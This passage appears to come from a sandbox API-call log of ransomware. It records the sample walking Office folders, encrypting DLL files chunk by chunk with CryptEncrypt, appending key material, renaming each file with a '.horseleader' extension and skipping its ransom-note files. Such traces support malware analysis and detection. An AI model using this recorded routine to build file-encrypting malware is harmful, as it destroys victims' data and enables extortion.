lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3accc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.931] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.933] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.933] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.933] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x75998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.933] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 
[0243.935] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.935] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.936] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.936] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.936] CloseHandle (hObject=0x158) returned 1 [0243.936] GetProcessHeap () returned 0x780000 [0243.936] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.937] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.horseleader") returned 82 [0243.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.horseleader")) returned 1 [0243.938] GetProcessHeap () returned 0x780000 [0243.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.938] 
FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c38700, ftCreationTime.dwHighDateTime=0x1cbc9fc, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x67c38700, ftLastWriteTime.dwHighDateTime=0x1cbc9fc, nFileSizeHigh=0x0, nFileSizeLow=0x5e158, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ATLCONV.DLL", cAlternateFileName="")) returned 1 [0243.938] lstrcmpiW (lpString1="ATLCONV.DLL", lpString2="Windows") returned -1 [0243.938] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0243.938] StrStrIW (lpFirst="ATLCONV.DLL", lpSrch=".horseleader") returned 0x0 [0243.938] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.938] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0243.938] lstrlenW (lpString=".testttjffg") returned 11 [0243.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0243.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0243.940] StrStrW (lpFirst="ATLCONV.DLL", lpSrch=".txt") returned 0x0 [0243.940] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=385368) returned 1 [0243.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.940] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2c8ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.949] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.958] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x59158, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.958] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.963] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.964] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.964] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.964] CloseHandle (hObject=0x158) returned 1 [0243.964] GetProcessHeap () returned 0x780000 [0243.964] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.964] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.horseleader") returned 83 [0243.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\atlconv.dll.horseleader")) returned 1 [0243.965] GetProcessHeap () returned 0x780000 [0243.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.965] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10f7500, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xda5b0540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb10f7500, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x4d67b0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0243.966] lstrcmpiW (lpString1="Csi.dll", lpString2="Windows") returned -1 [0243.966] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0243.966] StrStrIW (lpFirst="Csi.dll", lpSrch=".horseleader") returned 0x0 [0243.966] lstrcmpW (lpString1="Csi.dll", lpString2="#Decrypt#.txt") returned 1 [0243.966] lstrcmpW (lpString1="Csi.dll", lpString2="_uninstalling_.png") returned 1 [0243.966] lstrlenW (lpString=".testttjffg") returned 11 [0243.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll", lpSrch=".testttjffg") returned 0x0 [0243.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0243.967] StrStrW (lpFirst="Csi.dll", lpSrch=".txt") returned 0x0 [0243.967] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5072816) returned 1 [0243.967] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.968] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.980] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.981] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.981] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x268bd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.982] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.985] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 
[0243.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4d17b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.985] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.989] CloseHandle (hObject=0x158) returned 1 [0243.989] GetProcessHeap () returned 0x780000 [0243.989] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.989] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.horseleader") returned 79 [0243.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.horseleader")) returned 1 [0243.990] GetProcessHeap () returned 0x780000 [0243.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef87d800, ftCreationTime.dwHighDateTime=0x1cb8cce, ftLastAccessTime.dwLowDateTime=0xda5d66a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xef87d800, ftLastWriteTime.dwHighDateTime=0x1cb8cce, nFileSizeHigh=0x0, nFileSizeLow=0x1b3980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CsiSoap.dll", cAlternateFileName="")) returned 1 [0243.991] lstrcmpiW (lpString1="CsiSoap.dll", lpString2="Windows") returned -1 [0243.991] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0243.991] StrStrIW (lpFirst="CsiSoap.dll", lpSrch=".horseleader") returned 0x0 [0243.991] lstrcmpW (lpString1="CsiSoap.dll", lpString2="#Decrypt#.txt") returned 1 [0243.991] lstrcmpW (lpString1="CsiSoap.dll", lpString2="_uninstalling_.png") returned 1 [0243.991] lstrlenW (lpString=".testttjffg") returned 11 [0243.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll", lpSrch=".testttjffg") returned 0x0 [0243.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.991] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.992] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0243.992] StrStrW (lpFirst="CsiSoap.dll", lpSrch=".txt") returned 0x0 [0243.992] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1784192) returned 1 [0243.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.992] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.996] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.997] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.997] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.999] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ae980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.999] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.002] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.003] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.003] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.003] CloseHandle (hObject=0x158) returned 1 [0244.004] GetProcessHeap () returned 0x780000 [0244.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.004] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.horseleader") returned 83 
[0244.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.horseleader")) returned 1 [0244.005] GetProcessHeap () returned 0x780000 [0244.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.005] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Cultures", cAlternateFileName="")) returned 1 [0244.005] lstrcmpiW (lpString1="Cultures", lpString2="Windows") returned -1 [0244.005] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned 68 [0244.005] lstrcmpW (lpString1="Cultures", lpString2=".") returned 1 [0244.005] lstrcmpW (lpString1="Cultures", lpString2="..") returned 1 [0244.006] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.006] GetProcessHeap () returned 0x780000 [0244.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*") 
returned 70 [0244.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0244.006] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\.") returned 70 [0244.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="..", cAlternateFileName="")) returned 1 [0244.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 